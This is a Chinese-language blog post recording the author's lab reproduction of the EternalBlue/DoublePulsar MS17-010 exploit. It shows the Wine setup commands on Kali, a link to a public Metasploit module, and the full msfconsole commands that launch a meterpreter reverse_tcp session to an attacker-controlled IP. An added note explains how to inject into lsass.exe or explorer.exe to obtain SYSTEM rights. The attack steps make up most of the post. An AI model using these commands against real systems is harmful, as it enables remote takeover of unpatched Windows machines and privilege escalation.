- A+
前言
Shadow Brokers公布的文件需要win32位+python2.6+pywin32环境,利用起来有很多设置,略显麻烦,正好t00ls有相关的exp和利用过程,我就写了这篇文章记录我自己的一个复现过程。
0x00 创建wine
kali 64位
kali 64位需要兼容32位环境才可以使用,执行以下命令来安装32位运行库
'dpkg --add-architecture i386 apt-get update apt-get install lib32z1 lib32ncurses5 apt-get install wine32 wine cmd.exe'
kali 32位
直接执行 'wine cmd.exe'即可
0x01修改exp
-
下载exp:https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/
-
解压文件将其中的deps文件夹和eternalblue_doublepulsar.rb复制到/usr/share/metasploit-framework/modules/exploits/windows/smb/下,我在这里将eternalblue_doublepulsar.rb重命名为ms17_010_smb_RCE.rb,方便以后的查找利用。
0x02 复现
攻击机:kali 192.168.1.108
靶 机:win7 64位 旗舰版 sp1(关闭防火墙)
MSF使用就很简单了,下面列出主要的命令
'use exploit/windows/smb/ms17_010_smb_RCE set payload windows/x64/meterpreter/reverse_tcp set lhost 192.168.1.108 set rhost 192.168.1.107 set target 9 set targetarchitecture x64 exploit'
0x03 结语
本人菜鸟,记录的都是很简单的一些东西,大牛绕过就可以了,谢谢,欢迎交流。md语法也是一边百度一边用,可能排版不好,请见谅。
参考链接:https://www.t00ls.net/thread-39584-1-1.html
纠正
按照上面的攻击过程获取到的权限一般都是local service \ network service,无法进行提权。问题出现在PROCESSINJECT(注入进程)的设置上。上文中注入的进程是svchost.exe,我们查看进程可以发现svchost.exe有多个进程,分别有local service \ network service \ system三种权限。
这也就难怪获得的权限是local service \ network service。
我们只需将注入进程修改为system / admin权限的进程就OK,例如explorer.exe、lsass.exe等等。为了以后使用方便,我直接修改文件。
或者你可以每次利用时set PROCESSINJECT 进程名 设置即可。
End
- 我的微信
- 这是我的微信扫一扫
- 我的微信公众号
- 我的微信公众号扫一扫